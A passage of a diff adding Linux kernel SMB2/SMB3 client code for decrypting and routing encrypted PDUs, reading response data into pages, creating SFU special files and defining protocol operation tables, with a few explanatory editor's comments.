++	iov[0].iov_len = sizeof(struct smb2_transform_hdr);
++	iov[1].iov_base = buf + sizeof(struct smb2_transform_hdr);
++	iov[1].iov_len = buf_data_size;
++
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 2;
++	rqst.rq_pages = pages;
++	rqst.rq_npages = npages;
++	rqst.rq_pagesz = PAGE_SIZE;
++	rqst.rq_tailsz = (page_data_size % PAGE_SIZE) ? : PAGE_SIZE;
++
++	rc = crypt_message(server, 1, &rqst, 0);
++	cifs_dbg(FYI, "Decrypt message returned %d\n", rc);
++
++	if (rc)
++		return rc;
++
++	memmove(buf, iov[1].iov_base, buf_data_size);
++
++	if (!is_offloaded)
++		server->total_read = buf_data_size + page_data_size;
++
++	return rc;
++}
++
++static int
++read_data_into_pages(struct TCP_Server_Info *server, struct page **pages,
++		     unsigned int npages, unsigned int len)
++{
++	int i;
++	int length;
++
++	for (i = 0; i < npages; i++) {
++		struct page *page = pages[i];
++		size_t n;
++
++		n = len;
++		if (len >= PAGE_SIZE) {
++			/* enough data to fill the page */
++			n = PAGE_SIZE;
++			len -= n;
++		} else {
++			zero_user(page, len, PAGE_SIZE - len);
++			len = 0;
++		}
++		length = cifs_read_page_from_socket(server, page, 0, n);
++		if (length < 0)
++			return length;
++		server->total_read += length;
++	}
++
++	return 0;
++}
++
++static int
++init_read_bvec(struct page **pages, unsigned int npages, unsigned int data_size,
++	       unsigned int cur_off, struct bio_vec **page_vec)
++{
++	struct bio_vec *bvec;
++	int i;
++
++	bvec = kcalloc(npages, sizeof(struct bio_vec), GFP_KERNEL);
++	if (!bvec)
++		return -ENOMEM;
++
++	for (i = 0; i < npages; i++) {
++		bvec[i].bv_page = pages[i];
++		bvec[i].bv_offset = (i == 0) ? cur_off : 0;
++		bvec[i].bv_len = min_t(unsigned int, PAGE_SIZE, data_size);
++		data_size -= bvec[i].bv_len;
++	}
++
++	if (data_size != 0) {
++		cifs_dbg(VFS, "%s: something went wrong\n", __func__);
++		kfree(bvec);
++		return -EIO;
++	}
++
++	*page_vec = bvec;
++	return 0;
++}
++
++static int
++handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid,
++		 char *buf, unsigned int buf_len, struct page **pages,
++		 unsigned int npages, unsigned int page_data_size,
++		 bool is_offloaded)
++{
++	unsigned int data_offset;
++	unsigned int data_len;
++	unsigned int cur_off;
++	unsigned int cur_page_idx;
++	unsigned int pad_len;
++	struct cifs_readdata *rdata = mid->callback_data;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	struct bio_vec *bvec = NULL;
++	struct iov_iter iter;
++	struct kvec iov;
++	int length;
++	bool use_rdma_mr = false;
++
++	if (shdr->Command != SMB2_READ) {
++		cifs_server_dbg(VFS, "only big read responses are supported\n");
++		return -ENOTSUPP;
++	}
++
++	if (server->ops->is_session_expired &&
++	    server->ops->is_session_expired(buf)) {
++		if (!is_offloaded)
++			cifs_reconnect(server, true);
++		return -1;
++	}
++
++	if (server->ops->is_status_pending &&
++			server->ops->is_status_pending(buf, server))
++		return -1;
++
++	/* set up first two iov to get credits */
++	rdata->iov[0].iov_base = buf;
++	rdata->iov[0].iov_len = 0;
++	rdata->iov[1].iov_base = buf;
++	rdata->iov[1].iov_len =
++		min_t(unsigned int, buf_len, server->vals->read_rsp_size);
++	cifs_dbg(FYI, "0: iov_base=%p iov_len=%zu\n",
++		 rdata->iov[0].iov_base, rdata->iov[0].iov_len);
++	cifs_dbg(FYI, "1: iov_base=%p iov_len=%zu\n",
++		 rdata->iov[1].iov_base, rdata->iov[1].iov_len);
++
++	rdata->result = server->ops->map_error(buf, true);
++	if (rdata->result != 0) {
++		cifs_dbg(FYI, "%s: server returned error %d\n",
++			 __func__, rdata->result);
++		/* normal error on read response */
++		if (is_offloaded)
++			mid->mid_state = MID_RESPONSE_RECEIVED;
++		else
++			dequeue_mid(mid, false);
++		return 0;
++	}
++
++	data_offset = server->ops->read_data_offset(buf);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	use_rdma_mr = rdata->mr;
++#endif
++	data_len = server->ops->read_data_length(buf, use_rdma_mr);
++
++	if (data_offset < server->vals->read_rsp_size) {
++		/*
++		 * win2k8 sometimes sends an offset of 0 when the read
++		 * is beyond the EOF. Treat it as if the data starts just after
++		 * the header.
++		 */
++		cifs_dbg(FYI, "%s: data offset (%u) inside read response header\n",
++			 __func__, data_offset);
++		data_offset = server->vals->read_rsp_size;
++	} else if (data_offset > MAX_CIFS_SMALL_BUFFER_SIZE) {
++		/* data_offset is beyond the end of smallbuf */
++		cifs_dbg(FYI, "%s: data offset (%u) beyond end of smallbuf\n",
++			 __func__, data_offset);
++		rdata->result = -EIO;
++		if (is_offloaded)
++			mid->mid_state = MID_RESPONSE_MALFORMED;
++		else
++			dequeue_mid(mid, rdata->result);
++		return 0;
++	}
++
++	pad_len = data_offset - server->vals->read_rsp_size;
++
++	if (buf_len <= data_offset) {
++		/* read response payload is in pages */
++		cur_page_idx = pad_len / PAGE_SIZE;
++		cur_off = pad_len % PAGE_SIZE;
++
++		if (cur_page_idx != 0) {
++			/* data offset is beyond the 1st page of response */
++			cifs_dbg(FYI, "%s: data offset (%u) beyond 1st page of response\n",
++				 __func__, data_offset);
++			rdata->result = -EIO;
++			if (is_offloaded)
++				mid->mid_state = MID_RESPONSE_MALFORMED;
++			else
++				dequeue_mid(mid, rdata->result);
++			return 0;
++		}
++
++		if (data_len > page_data_size - pad_len) {
++			/* data_len is corrupt -- discard frame */
++			rdata->result = -EIO;
++			if (is_offloaded)
++				mid->mid_state = MID_RESPONSE_MALFORMED;
++			else
++				dequeue_mid(mid, rdata->result);
++			return 0;
++		}
++
++		rdata->result = init_read_bvec(pages, npages, page_data_size,
++					       cur_off, &bvec);
++		if (rdata->result != 0) {
++			if (is_offloaded)
++				mid->mid_state = MID_RESPONSE_MALFORMED;
++			else
++				dequeue_mid(mid, rdata->result);
++			return 0;
++		}
++
++		iov_iter_bvec(&iter, ITER_SOURCE, bvec, npages, data_len);
++	} else if (buf_len >= data_offset + data_len) {
++		/* read response payload is in buf */
++		WARN_ONCE(npages > 0, "read data can be either in buf or in pages");
++		iov.iov_base = buf + data_offset;
++		iov.iov_len = data_len;
++		iov_iter_kvec(&iter, ITER_SOURCE, &iov, 1, data_len);
++	} else {
++		/* read response payload cannot be in both buf and pages */
++		WARN_ONCE(1, "buf can not contain only a part of read data");
++		rdata->result = -EIO;
++		if (is_offloaded)
++			mid->mid_state = MID_RESPONSE_MALFORMED;
++		else
++			dequeue_mid(mid, rdata->result);
++		return 0;
++	}
++
++	length = rdata->copy_into_pages(server, rdata, &iter);
++
++	kfree(bvec);
++
++	if (length < 0)
++		return length;
++
++	if (is_offloaded)
++		mid->mid_state = MID_RESPONSE_RECEIVED;
++	else
++		dequeue_mid(mid, false);
++	return length;
++}
++
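++/*
++ * Context for decryption work offloaded to decrypt_wq by
++ * receive_encrypted_read() for large encrypted read responses.
++ */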
++struct smb2_decrypt_work {
++	struct work_struct decrypt;
++	struct TCP_Server_Info *server;
++	struct page **ppages;
++	char *buf;
++	unsigned int npages;
++	unsigned int len;
++};
++
++
++static void smb2_decrypt_offload(struct work_struct *work)
++{
++	struct smb2_decrypt_work *dw = container_of(work,
++				struct smb2_decrypt_work, decrypt);
++	int i, rc;
++	struct mid_q_entry *mid;
++
++	rc = decrypt_raw_data(dw->server, dw->buf, dw->server->vals->read_rsp_size,
++			      dw->ppages, dw->npages, dw->len, true);
++	if (rc) {
++		cifs_dbg(VFS, "error decrypting rc=%d\n", rc);
++		goto free_pages;
++	}
++
++	dw->server->lstrp = jiffies;
++	mid = smb2_find_dequeue_mid(dw->server, dw->buf);
++	if (mid == NULL)
++		cifs_dbg(FYI, "mid not found\n");
++	else {
++		mid->decrypted = true;
++		rc = handle_read_data(dw->server, mid, dw->buf,
++				      dw->server->vals->read_rsp_size,
++				      dw->ppages, dw->npages, dw->len,
++				      true);
++		if (rc >= 0) {
++#ifdef CONFIG_CIFS_STATS2
++			mid->when_received = jiffies;
++#endif
++			if (dw->server->ops->is_network_name_deleted)
++				dw->server->ops->is_network_name_deleted(dw->buf,
++									 dw->server);
++
++			mid->callback(mid);
++		} else {
++			spin_lock(&dw->server->srv_lock);
++			if (dw->server->tcpStatus == CifsNeedReconnect) {
++				spin_lock(&dw->server->mid_lock);
++				mid->mid_state = MID_RETRY_NEEDED;
++				spin_unlock(&dw->server->mid_lock);
++				spin_unlock(&dw->server->srv_lock);
++				mid->callback(mid);
++			} else {
++				spin_lock(&dw->server->mid_lock);
++				mid->mid_state = MID_REQUEST_SUBMITTED;
++				mid->mid_flags &= ~(MID_DELETED);
++				list_add_tail(&mid->qhead,
++					&dw->server->pending_mid_q);
++				spin_unlock(&dw->server->mid_lock);
++				spin_unlock(&dw->server->srv_lock);
++			}
++		}
++		release_mid(mid);
++	}
++
++free_pages:
++	for (i = dw->npages-1; i >= 0; i--)
++		put_page(dw->ppages[i]);
++
++	kfree(dw->ppages);
++	cifs_small_buf_release(dw->buf);
++	kfree(dw);
++}
++
++
++static int
++receive_encrypted_read(struct TCP_Server_Info *server, struct mid_q_entry **mid,
++		       int *num_mids)
++{
++	char *buf = server->smallbuf;
++	struct smb2_transform_hdr *tr_hdr = (struct smb2_transform_hdr *)buf;
++	unsigned int npages;
++	struct page **pages;
++	unsigned int len;
++	unsigned int buflen = server->pdu_size;
++	int rc;
++	int i = 0;
++	struct smb2_decrypt_work *dw;
++
++	*num_mids = 1;
++	len = min_t(unsigned int, buflen, server->vals->read_rsp_size +
++		sizeof(struct smb2_transform_hdr)) - HEADER_SIZE(server) + 1;
++
++	rc = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1, len);
++	if (rc < 0)
++		return rc;
++	server->total_read += rc;
++
++	len = le32_to_cpu(tr_hdr->OriginalMessageSize) -
++		server->vals->read_rsp_size;
++	npages = DIV_ROUND_UP(len, PAGE_SIZE);
++
++	pages = kmalloc_array(npages, sizeof(struct page *), GFP_KERNEL);
++	if (!pages) {
++		rc = -ENOMEM;
++		goto discard_data;
++	}
++
++	for (; i < npages; i++) {
++		pages[i] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
++		if (!pages[i]) {
++			rc = -ENOMEM;
++			goto discard_data;
++		}
++	}
++
++	/* read the read-response data into pages */
++	rc = read_data_into_pages(server, pages, npages, len);
++	if (rc)
++		goto free_pages;
++
++	rc = cifs_discard_remaining_data(server);
++	if (rc)
++		goto free_pages;
++
++	/*
++	 * For large reads, offload decryption to a worker thread for better
++	 * performance, since decryption is expensive and this lets more
++	 * cores share the work.
++	 */
++
++	if ((server->min_offload) && (server->in_flight > 1) &&
++	    (server->pdu_size >= server->min_offload)) {
++		dw = kmalloc(sizeof(struct smb2_decrypt_work), GFP_KERNEL);
++		if (dw == NULL)
++			goto non_offloaded_decrypt;
++
++		dw->buf = server->smallbuf;
++		server->smallbuf = (char *)cifs_small_buf_get();
++
++		INIT_WORK(&dw->decrypt, smb2_decrypt_offload);
++
++		dw->npages = npages;
++		dw->server = server;
++		dw->ppages = pages;
++		dw->len = len;
++		queue_work(decrypt_wq, &dw->decrypt);
++		*num_mids = 0; /* worker thread takes care of finding mid */
++		return -1;
++	}
++
++non_offloaded_decrypt:
++	rc = decrypt_raw_data(server, buf, server->vals->read_rsp_size,
++			      pages, npages, len, false);
++	if (rc)
++		goto free_pages;
++
++	*mid = smb2_find_mid(server, buf);
++	if (*mid == NULL)
++		cifs_dbg(FYI, "mid not found\n");
++	else {
++		cifs_dbg(FYI, "mid found\n");
++		(*mid)->decrypted = true;
++		rc = handle_read_data(server, *mid, buf,
++				      server->vals->read_rsp_size,
++				      pages, npages, len, false);
++		if (rc >= 0) {
++			if (server->ops->is_network_name_deleted) {
++				server->ops->is_network_name_deleted(buf,
++								server);
++			}
++		}
++	}
++
++free_pages:
++	for (i = i - 1; i >= 0; i--)
++		put_page(pages[i]);
++	kfree(pages);
++	return rc;
++discard_data:
++	cifs_discard_remaining_data(server);
++	goto free_pages;
++}
++
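++/*
++ * Decrypt a non-read encrypted PDU in place, then walk the NextCommand
++ * chain, handing each decrypted SMB2 message to its mid handler.
++ */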
++static int
++receive_encrypted_standard(struct TCP_Server_Info *server,
++			   struct mid_q_entry **mids, char **bufs,
++			   int *num_mids)
++{
++	int ret, length;
++	char *buf = server->smallbuf;
++	struct smb2_hdr *shdr;
++	unsigned int pdu_length = server->pdu_size;
++	unsigned int buf_size;
++	struct mid_q_entry *mid_entry;
++	int next_is_large;
++	char *next_buffer = NULL;
++
++	*num_mids = 0;
++
++	/* switch to large buffer if too big for a small one */
++	if (pdu_length > MAX_CIFS_SMALL_BUFFER_SIZE) {
++		server->large_buf = true;
++		memcpy(server->bigbuf, buf, server->total_read);
++		buf = server->bigbuf;
++	}
++
++	/* now read the rest */
++	length = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1,
++				pdu_length - HEADER_SIZE(server) + 1);
++	if (length < 0)
++		return length;
++	server->total_read += length;
++
++	buf_size = pdu_length - sizeof(struct smb2_transform_hdr);
++	length = decrypt_raw_data(server, buf, buf_size, NULL, 0, 0, false);
++	if (length)
++		return length;
++
++	next_is_large = server->large_buf;
++one_more:
++	shdr = (struct smb2_hdr *)buf;
++	if (shdr->NextCommand) {
++		if (next_is_large)
++			next_buffer = (char *)cifs_buf_get();
++		else
++			next_buffer = (char *)cifs_small_buf_get();
++		memcpy(next_buffer,
++		       buf + le32_to_cpu(shdr->NextCommand),
++		       pdu_length - le32_to_cpu(shdr->NextCommand));
++	}
++
++	mid_entry = smb2_find_mid(server, buf);
++	if (mid_entry == NULL)
++		cifs_dbg(FYI, "mid not found\n");
++	else {
++		cifs_dbg(FYI, "mid found\n");
++		mid_entry->decrypted = true;
++		mid_entry->resp_buf_size = server->pdu_size;
++	}
++
++	if (*num_mids >= MAX_COMPOUND) {
++		cifs_server_dbg(VFS, "too many PDUs in compound\n");
++		return -1;
++	}
++	bufs[*num_mids] = buf;
++	mids[(*num_mids)++] = mid_entry;
++
++	if (mid_entry && mid_entry->handle)
++		ret = mid_entry->handle(server, mid_entry);
++	else
++		ret = cifs_handle_standard(server, mid_entry);
++
++	if (ret == 0 && shdr->NextCommand) {
++		pdu_length -= le32_to_cpu(shdr->NextCommand);
++		server->large_buf = next_is_large;
++		if (next_is_large)
++			server->bigbuf = buf = next_buffer;
++		else
++			server->smallbuf = buf = next_buffer;
++		goto one_more;
++	} else if (ret != 0) {
++		/*
++		 * ret != 0 here means that we didn't get to handle_mid() thus
++		 * server->smallbuf and server->bigbuf are still valid. We need
++		 * to free next_buffer because it is not going to be used
++		 * anywhere.
++		 */
++		if (next_is_large)
++			free_rsp_buf(CIFS_LARGE_BUFFER, next_buffer);
++		else
++			free_rsp_buf(CIFS_SMALL_BUFFER, next_buffer);
++	}
++
++	return ret;
++}
++
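++/*
++ * Entry point for encrypted PDUs: validate the transform header sizes,
++ * then route large payloads to receive_encrypted_read() and everything
++ * else to receive_encrypted_standard().
++ */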
++static int
++smb3_receive_transform(struct TCP_Server_Info *server,
++		       struct mid_q_entry **mids, char **bufs, int *num_mids)
++{
++	char *buf = server->smallbuf;
++	unsigned int pdu_length = server->pdu_size;
++	struct smb2_transform_hdr *tr_hdr = (struct smb2_transform_hdr *)buf;
++	unsigned int orig_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
++
++	if (pdu_length < sizeof(struct smb2_transform_hdr) +
++						sizeof(struct smb2_hdr)) {
++		cifs_server_dbg(VFS, "Transform message is too small (%u)\n",
++			 pdu_length);
++		cifs_reconnect(server, true);
++		return -ECONNABORTED;
++	}
++
++	if (pdu_length < orig_len + sizeof(struct smb2_transform_hdr)) {
++		cifs_server_dbg(VFS, "Transform message is broken\n");
++		cifs_reconnect(server, true);
++		return -ECONNABORTED;
++	}
++
++	/* TODO: add support for compounds containing READ. */
++	if (pdu_length > CIFSMaxBufSize + MAX_HEADER_SIZE(server)) {
++		return receive_encrypted_read(server, &mids[0], num_mids);
++	}
++
++	return receive_encrypted_standard(server, mids, bufs, num_mids);
++}
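++
++/*
++ * Editor's note (illustrative, not part of the upstream patch): the two
++ * sanity checks above bound pdu_length from both sides -- the frame must
++ * hold at least a transform header plus one SMB2 header, and it must be
++ * big enough to carry OriginalMessageSize bytes of ciphertext, i.e.
++ * pdu_length >= orig_len + sizeof(struct smb2_transform_hdr).  Anything
++ * else is treated as a corrupt frame and forces a reconnect.
++ */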
++
++int
++smb3_handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	char *buf = server->large_buf ? server->bigbuf : server->smallbuf;
++
++	return handle_read_data(server, mid, buf, server->pdu_size,
++				NULL, 0, 0, false);
++}
++
++static int
++smb2_next_header(char *buf)
++{
++	struct smb2_hdr *hdr = (struct smb2_hdr *)buf;
++	struct smb2_transform_hdr *t_hdr = (struct smb2_transform_hdr *)buf;
++
++	if (hdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM)
++		return sizeof(struct smb2_transform_hdr) +
++		  le32_to_cpu(t_hdr->OriginalMessageSize);
++
++	return le32_to_cpu(hdr->NextCommand);
++}
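++
++/*
++ * Editor's note (illustrative, not part of the upstream patch):
++ * smb2_next_header() returns the byte offset of the next PDU in the
++ * receive buffer.  An encrypted (transform) PDU is stepped over as one
++ * unit -- transform header plus OriginalMessageSize -- while a plain PDU
++ * is stepped by NextCommand, which is 0 on the last PDU of a chain.  A
++ * hypothetical walk over a plain compound chain therefore looks like:
++ *
++ *	while ((off = smb2_next_header(buf)) != 0)
++ *		buf += off;
++ */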
++
++static int
++smb2_make_node(unsigned int xid, struct inode *inode,
++	       struct dentry *dentry, struct cifs_tcon *tcon,
++	       const char *full_path, umode_t mode, dev_t dev)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	int rc = -EPERM;
++	struct cifs_open_info_data buf = {};
++	struct cifs_io_parms io_parms = {0};
++	__u32 oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	unsigned int bytes_written;
++	struct win_dev *pdev;
++	struct kvec iov[2];
++
++	/*
++	 * Check if mounted with the 'sfu' mount parm.
++	 * SFU emulation should work with all servers, but only
++	 * supports block and char devices (no socket & fifo),
++	 * and was used by default in earlier versions of Windows.
++	 */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
++		return rc;
++
++	/*
++	 * TODO: Add ability to create via reparse point instead. Windows (e.g.
++	 * their current NFS server) uses this approach to expose special files
++	 * over SMB2/SMB3 and Samba will do this with SMB3.1.1 POSIX Extensions
++	 */
++
++	if (!S_ISCHR(mode) && !S_ISBLK(mode))
++		return rc;
++
++	cifs_dbg(FYI, "sfu compat create special file\n");
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	if (tcon->ses->server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
++	if (rc)
++		return rc;
++
++	/*
++	 * BB Do not bother to decode buf since no local inode yet to put
++	 * timestamps in, but we can reuse it safely.
++	 */
++
++	pdev = (struct win_dev *)&buf.fi;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = sizeof(struct win_dev);
++	iov[1].iov_base = &buf.fi;
++	iov[1].iov_len = sizeof(struct win_dev);
++	if (S_ISCHR(mode)) {
++		memcpy(pdev->type, "IntxCHR", 8);
++		pdev->major = cpu_to_le64(MAJOR(dev));
++		pdev->minor = cpu_to_le64(MINOR(dev));
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
++	} else if (S_ISBLK(mode)) {
++		memcpy(pdev->type, "IntxBLK", 8);
++		pdev->major = cpu_to_le64(MAJOR(dev));
++		pdev->minor = cpu_to_le64(MINOR(dev));
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
++	}
++	tcon->ses->server->ops->close(xid, tcon, &fid);
++	d_drop(dentry);
++
++	/* FIXME: add code here to set EAs */
++
++	cifs_free_open_info(&buf);
++	return rc;
++}
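++
++/*
++ * Editor's note (illustrative, not part of the upstream patch): the SFU
++ * representation written above is a 24-byte blob at offset 0 of the file,
++ * an 8-byte tag followed by two little-endian 64-bit values:
++ *
++ *	struct win_dev {
++ *		unsigned char type[8];	// "IntxCHR" or "IntxBLK"
++ *		__le64 major;
++ *		__le64 minor;
++ *	} __packed;
++ *
++ * A reader recovers the device number by matching the tag and then taking
++ * MKDEV(le64_to_cpu(major), le64_to_cpu(minor)).
++ */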
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++struct smb_version_operations smb20_operations = {
++	.compare_fids = smb2_compare_fids,
++	.setup_request = smb2_setup_request,
++	.setup_async_request = smb2_setup_async_request,
++	.check_receive = smb2_check_receive,
++	.add_credits = smb2_add_credits,
++	.set_credits = smb2_set_credits,
++	.get_credits_field = smb2_get_credits_field,
++	.get_credits = smb2_get_credits,
++	.wait_mtu_credits = cifs_wait_mtu_credits,
++	.get_next_mid = smb2_get_next_mid,
++	.revert_current_mid = smb2_revert_current_mid,
++	.read_data_offset = smb2_read_data_offset,
++	.read_data_length = smb2_read_data_length,
++	.map_error = map_smb2_to_linux_error,
++	.find_mid = smb2_find_mid,
++	.check_message = smb2_check_message,
++	.dump_detail = smb2_dump_detail,
++	.clear_stats = smb2_clear_stats,
++	.print_stats = smb2_print_stats,
++	.is_oplock_break = smb2_is_valid_oplock_break,
++	.handle_cancelled_mid = smb2_handle_cancelled_mid,
++	.downgrade_oplock = smb2_downgrade_oplock,
++	.need_neg = smb2_need_neg,
++	.negotiate = smb2_negotiate,
++	.negotiate_wsize = smb2_negotiate_wsize,
++	.negotiate_rsize = smb2_negotiate_rsize,
++	.sess_setup = SMB2_sess_setup,
++	.logoff = SMB2_logoff,
++	.tree_connect = SMB2_tcon,
++	.tree_disconnect = SMB2_tdis,
++	.qfs_tcon = smb2_qfs_tcon,
++	.is_path_accessible = smb2_is_path_accessible,
++	.can_echo = smb2_can_echo,
++	.echo = SMB2_echo,
++	.query_path_info = smb2_query_path_info,
++	.get_srv_inum = smb2_get_srv_inum,
++	.query_file_info = smb2_query_file_info,
++	.set_path_size = smb2_set_path_size,
++	.set_file_size = smb2_set_file_size,
++	.set_file_info = smb2_set_file_info,
++	.set_compression = smb2_set_compression,
++	.mkdir = smb2_mkdir,
++	.mkdir_setinfo = smb2_mkdir_setinfo,
++	.rmdir = smb2_rmdir,
++	.unlink = smb2_unlink,
++	.rename = smb2_rename_path,
++	.create_hardlink = smb2_create_hardlink,
++	.query_symlink = smb2_query_symlink,
++	.query_mf_symlink = smb3_query_mf_symlink,
++	.create_mf_symlink = smb3_create_mf_symlink,
++	.open = smb2_open_file,
++	.set_fid = smb2_set_fid,
++	.close = smb2_close_file,
++	.flush = smb2_flush_file,
++	.async_readv = smb2_async_readv,
++	.async_writev = smb2_async_writev,
++	.sync_read = smb2_sync_read,
++	.sync_write = smb2_sync_write,
++	.query_dir_first = smb2_query_dir_first,
++	.query_dir_next = smb2_query_dir_next,
++	.close_dir = smb2_close_dir,
++	.calc_smb_size = smb2_calc_size,
++	.is_status_pending = smb2_is_status_pending,
++	.is_session_expired = smb2_is_session_expired,
++	.oplock_response = smb2_oplock_response,
++	.queryfs = smb2_queryfs,
++	.mand_lock = smb2_mand_lock,
++	.mand_unlock_range = smb2_unlock_range,
++	.push_mand_locks = smb2_push_mandatory_locks,
++	.get_lease_key = smb2_get_lease_key,
++	.set_lease_key = smb2_set_lease_key,
++	.new_lease_key = smb2_new_lease_key,
++	.calc_signature = smb2_calc_signature,
++	.is_read_op = smb2_is_read_op,
++	.set_oplock_level = smb2_set_oplock_level,
++	.create_lease_buf = smb2_create_lease_buf,
++	.parse_lease_buf = smb2_parse_lease_buf,
++	.copychunk_range = smb2_copychunk_range,
++	.wp_retry_size = smb2_wp_retry_size,
++	.dir_needs_close = smb2_dir_needs_close,
++	.get_dfs_refer = smb2_get_dfs_refer,
++	.select_sectype = smb2_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = smb2_query_eas,
++	.set_EA = smb2_set_ea,
++#endif /* CIFS_XATTR */
++	.get_acl = get_smb2_acl,
++	.get_acl_by_fid = get_smb2_acl_by_fid,
++	.set_acl = set_smb2_acl,
++	.next_header = smb2_next_header,
++	.ioctl_query_info = smb2_ioctl_query_info,
++	.make_node = smb2_make_node,
++	.fiemap = smb3_fiemap,
++	.llseek = smb3_llseek,
++	.is_status_io_timeout = smb2_is_status_io_timeout,
++	.is_network_name_deleted = smb2_is_network_name_deleted,
++};
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++
++struct smb_version_operations smb21_operations = {
++	.compare_fids = smb2_compare_fids,
++	.setup_request = smb2_setup_request,
++	.setup_async_request = smb2_setup_async_request,
++	.check_receive = smb2_check_receive,
++	.add_credits = smb2_add_credits,
++	.set_credits = smb2_set_credits,
++	.get_credits_field = smb2_get_credits_field,
++	.get_credits = smb2_get_credits,
++	.wait_mtu_credits = smb2_wait_mtu_credits,
++	.adjust_credits = smb2_adjust_credits,
++	.get_next_mid = smb2_get_next_mid,
++	.revert_current_mid = smb2_revert_current_mid,
++	.read_data_offset = smb2_read_data_offset,
++	.read_data_length = smb2_read_data_length,
++	.map_error = map_smb2_to_linux_error,
++	.find_mid = smb2_find_mid,
++	.check_message = smb2_check_message,
++	.dump_detail = smb2_dump_detail,
++	.clear_stats = smb2_clear_stats,
++	.print_stats = smb2_print_stats,
++	.is_oplock_break = smb2_is_valid_oplock_break,
++	.handle_cancelled_mid = smb2_handle_cancelled_mid,
++	.downgrade_oplock = smb2_downgrade_oplock,
++	.need_neg = smb2_need_neg,
++	.negotiate = smb2_negotiate,
++	.negotiate_wsize = smb2_negotiate_wsize,
++	.negotiate_rsize = smb2_negotiate_rsize,
++	.sess_setup = SMB2_sess_setup,
++	.logoff = SMB2_logoff,
++	.tree_connect = SMB2_tcon,
++	.tree_disconnect = SMB2_tdis,
++	.qfs_tcon = smb2_qfs_tcon,
++	.is_path_accessible = smb2_is_path_accessible,
++	.can_echo = smb2_can_echo,
++	.echo = SMB2_echo,
++	.query_path_info = smb2_query_path_info,
++	.get_srv_inum = smb2_get_srv_inum,
++	.query_file_info = smb2_query_file_info,
++	.set_path_size = smb2_set_path_size,
++	.set_file_size = smb2_set_file_size,
++	.set_file_info = smb2_set_file_info,
++	.set_compression = smb2_set_compression,
++	.mkdir = smb2_mkdir,
++	.mkdir_setinfo = smb2_mkdir_setinfo,
++	.rmdir = smb2_rmdir,
++	.unlink = smb2_unlink,
++	.rename = smb2_rename_path,
++	.create_hardlink = smb2_create_hardlink,
++	.query_symlink = smb2_query_symlink,
++	.query_mf_symlink = smb3_query_mf_symlink,
++	.create_mf_symlink = smb3_create_mf_symlink,
++	.open = smb2_open_file,
++	.set_fid = smb2_set_fid,
++	.close = smb2_close_file,
++	.flush = smb2_flush_file,
++	.async_readv = smb2_async_readv,
++	.async_writev = smb2_async_writev,
++	.sync_read = smb2_sync_read,
++	.sync_write = smb2_sync_write,
++	.query_dir_first = smb2_query_dir_first,
++	.query_dir_next = smb2_query_dir_next,
++	.close_dir = smb2_close_dir,
++	.calc_smb_size = smb2_calc_size,
++	.is_status_pending = smb2_is_status_pending,
++	.is_session_expired = smb2_is_session_expired,
++	.oplock_response = smb2_oplock_response,
++	.queryfs = smb2_queryfs,
++	.mand_lock = smb2_mand_lock,
++	.mand_unlock_range = smb2_unlock_range,
++	.push_mand_locks = smb2_push_mandatory_locks,
++	.get_lease_key = smb2_get_lease_key,
++	.set_lease_key = smb2_set_lease_key,
++	.new_lease_key = smb2_new_lease_key,
++	.calc_signature = smb2_calc_signature,
++	.is_read_op = smb21_is_read_op,
++	.set_oplock_level = smb21_set_oplock_level,
++	.create_lease_buf = smb2_create_lease_buf,
++	.parse_lease_buf = smb2_parse_lease_buf,
++	.copychunk_range = smb2_copychunk_range,
++	.wp_retry_size = smb2_wp_retry_size,
++	.dir_needs_close = smb2_dir_needs_close,
++	.enum_snapshots = smb3_enum_snapshots,
++	.notify = smb3_notify,
++	.get_dfs_refer = smb2_get_dfs_refer,
++	.select_sectype = smb2_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = smb2_query_eas,
++	.set_EA = smb2_set_ea,
++#endif /* CIFS_XATTR */
++	.get_acl = get_smb2_acl,
++	.get_acl_by_fid = get_smb2_acl_by_fid,
++	.set_acl = set_smb2_acl,
++	.next_header = smb2_next_header,
++	.ioctl_query_info = smb2_ioctl_query_info,
++	.make_node = smb2_make_node,
++	.fiemap = smb3_fiemap,
++	.llseek = smb3_llseek,
++	.is_status_io_timeout = smb2_is_status_io_timeout,
++	.is_network_name_deleted = smb2_is_network_name_deleted,
++};
++
++struct smb_version_operations smb30_operations = {
++	.compare_fids = smb2_compare_fids,
++	.setup_request = smb2_setup_request,
++	.setup_async_request = smb2_setup_async_request,
++	.check_receive = smb2_check_receive,
++	.add_credits = smb2_add_credits,
++	.set_credits = smb2_set_credits,
++	.get_credits_field = smb2_get_credits_field,
++	.get_credits = smb2_get_credits,
++	.wait_mtu_credits = smb2_wait_mtu_credits,
++	.adjust_credits = smb2_adjust_credits,
++	.get_next_mid = smb2_get_next_mid,
